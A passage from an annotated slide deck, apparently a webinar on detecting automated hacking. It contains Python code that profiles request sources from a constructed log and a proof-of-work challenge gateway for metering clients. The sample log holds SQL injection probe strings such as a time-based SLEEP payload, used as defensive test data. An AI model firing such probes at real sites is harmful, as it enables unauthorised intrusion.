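       _rec("2012-03-01 10:09:00", "192.0.2.77", "shop.example", "GET /item.php?id=1 AND SLEEP(5)",
            dict(BROWSER_HDRS, **{"User-Agent": "Mozilla/5.0 (Macintosh) Safari/534"})),
       _rec("2012-03-01 10:14:00", "192.0.2.77", "shop.example", "GET /item.php?id=1; --",
            dict(BROWSER_HDRS, **{"User-Agent": "Opera/9.80"}))]
)

if __name__ == "__main__":
    for src, p in profile_sources(SAMPLE_LOG).items():
        print(src, p["label"], p)
```

On the constructed log the SQLi tool shows up as one target, eight suspicious requests inside a single window and a browser-like User-Agent that never sends Accept-Language; the RFI scanner shows up as one probe per site across four days (persistent by the deck's definition) with the same shell URL reused against every target. The NAT address is the caveat the slide raises: three different user agents behind one IP make its rate numbers meaningless, so the label deliberately refuses to call it a tool. Note also that the RFI pattern matches any parameter carrying a URL, so a legitimate redirect endpoint would be counted as suspicious; in practice the suspicious-request filter is the WAF's attack signatures, not three regexes.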
29. Detecting Automated Hacking - Passive
30. Detecting Automated Hacking - Active
  - Introduce changes into the server response
    + Test the client's reaction to the changes
    + May affect user experience – use with care
    + Verify the type of user agent
  - Browsers support JavaScript and an appropriate DOM
    + Client is expected to complete some computation
    + Application / gateway can validate the computed value
  - Browsers comply with HTML tags (IMG, IFRAME)
    + Client is expected to access the resource referenced by the embedded tags
    + Failure to access the resource implies that the client is an automated script

31. Mitigation - Wisdom of the Crowds
  - Detected automation feeds into building fingerprints of tools and reputation data for sources
  - Leveraged when data is collected within a community
  - Recent regulatory changes endorse the concept of community
  - Drop requests matching fingerprints or coming from ill-reputed sources

32. Mitigation – Challenges and Metering
  - Introduce changes to the response that require a true browser user-agent before letting any further requests through within a session
    + Application / gateway keeps sending the test for any request not in a validated session
    + A session is validated only if the user-agent responds properly
  - Introduce changes to the response that (building on the previous enforcement) add client-side latency
    + Challenge the client to solve a mathematical riddle
    + Partial hash collisions are a good example
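The session-validation loop and the partial-hash-collision metering from this slide, together with the "client completes a computation, gateway validates the value" check from the Active slide, as an added example showing both sides of the exchange. This is not the deck's or Imperva's code: the challenge format, the HMAC that binds a challenge to its session so the gateway can stay stateless, the SHA-256 leading-zero-bits proof of work and the difficulty schedule are all assumptions. In a real deployment the solver would be JavaScript injected into the page and the answer would come back in a cookie or form field; the Python `solve_challenge` stands in for that.

```python
# Challenge-and-metering exchange between a gateway and a client. Added example,
# not Imperva's product logic: message format, HMAC binding and proof of work are assumptions.
import hashlib
import hmac
import os
import time


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a digest (the 'partial collision' measure)."""
    return len(digest) * 8 - int.from_bytes(digest, "big").bit_length()


def work_hash(nonce: str, answer: int) -> bytes:
    """Same function on both sides: the client searches for an answer, the gateway checks one."""
    return hashlib.sha256(f"{nonce}:{answer}".encode()).digest()


class Gateway:
    """Stand-in for the application gateway: every request outside a validated
    session is answered with a challenge; the session is validated only once a
    correct answer arrives, and later requests pass without further tests."""

    def __init__(self, secret: bytes, base_difficulty: int = 12, ttl: int = 300):
        self.secret = secret
        self.base_difficulty = base_difficulty   # leading zero bits required (2**12 tries on average)
        self.ttl = ttl                           # seconds a challenge stays answerable
        self.validated = set()

    def _mac(self, session_id: str, nonce: str, difficulty: int, expires: int) -> str:
        msg = f"{session_id}|{nonce}|{difficulty}|{expires}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue_challenge(self, session_id: str, suspicion: int = 0, now: float = None) -> dict:
        """Metering: the difficulty, and with it the client-side latency, grows with how
        suspicious the source looks; each extra bit doubles the expected work."""
        now = time.time() if now is None else now
        nonce = os.urandom(16).hex()
        difficulty = min(self.base_difficulty + 2 * suspicion, 24)
        expires = int(now) + self.ttl
        # The MAC keeps the gateway stateless: nonce, difficulty and expiry travel with
        # the client and are verified on return instead of being stored per session.
        return {"nonce": nonce, "difficulty": difficulty, "expires": expires,
                "mac": self._mac(session_id, nonce, difficulty, expires)}

    def verify(self, session_id: str, challenge: dict, answer: int, now: float = None) -> bool:
        now = time.time() if now is None else now
        expected = self._mac(session_id, challenge["nonce"], challenge["difficulty"], challenge["expires"])
        if not hmac.compare_digest(expected, str(challenge.get("mac", ""))):
            return False   # parameters altered (e.g. difficulty lowered) or challenge belongs to another session
        if now > challenge["expires"]:
            return False   # stale challenge: answers cannot be stockpiled and replayed later
        return leading_zero_bits(work_hash(challenge["nonce"], answer)) >= challenge["difficulty"]

    def handle(self, session_id: str, path: str, challenge: dict = None, answer: int = None,
               suspicion: int = 0) -> tuple:
        """('200', path) for a served request, ('403', challenge) for anything not yet validated."""
        if session_id in self.validated:
            return ("200", path)
        if challenge is not None and answer is not None and self.verify(session_id, challenge, answer):
            self.validated.add(session_id)
            return ("200", path)
        return ("403", self.issue_challenge(session_id, suspicion))


def solve_challenge(challenge: dict) -> int:
    """Client side, i.e. what the injected JavaScript does in a browser: count up until
    the hash has enough leading zero bits. A script that ignores the page never gets past 403."""
    answer = 0
    while leading_zero_bits(work_hash(challenge["nonce"], answer)) < challenge["difficulty"]:
        answer += 1
    return answer


if __name__ == "__main__":
    gw = Gateway(secret=b"constructed-demo-key")
    status, challenge = gw.handle("session-1", "/item.php?id=7")     # first request: challenged
    answer = solve_challenge(challenge)
    print(status, "difficulty", challenge["difficulty"], "answer", answer)
    print(gw.handle("session-1", "/item.php?id=7", challenge, answer))  # answer accepted, session validated
    print(gw.handle("session-1", "/cart.php"))                         # passes with no further test
    print(gw.handle("session-2", "/cart.php", challenge, answer)[0])    # answer is bound to session-1: 403
```

Two properties matter for the slide's argument. First, the test is cheap for a browser (a few thousand hashes at 12 bits) but a tool that does not run the page's script never leaves the 403 loop, which is the "true browser user-agent" requirement. Second, the difficulty is raised per source rather than globally, so the latency lands on the noisy sources identified by the passive indicators while ordinary users see the base cost. The IMG/IFRAME resource-fetch check from the Active slide is a separate mechanism and is not implemented here; and a headless browser does solve this challenge, so metering slows such clients down rather than stopping them.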
33. Mitigation (cont.)
  - Introduce a CAPTCHA or another test that tells a human operator apart from a script

34. Summary
  - Automation is ruling the threat landscape
    + It accounts for the lion's share of attack traffic
  - Automation is used in various forms
    + In-depth scanning / attack of a single target
    + Wide-breadth scanning / attack of multiple applications
    + Distributed scanning / attack of single / multiple applications

35. Summary (cont.)
  - Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks
  - Detection and mitigation are most effectively deployed outside of the application
  - Detection and mitigation must include a combination of passive and active measures
  - Detection and mitigation are best utilized within a community that can generate reputation data

36. Webinar Materials
  - Join our LinkedIn group, Imperva Data Security Direct, for: answers to attendee questions, post-webinar discussions, the webinar slides and the webinar recording link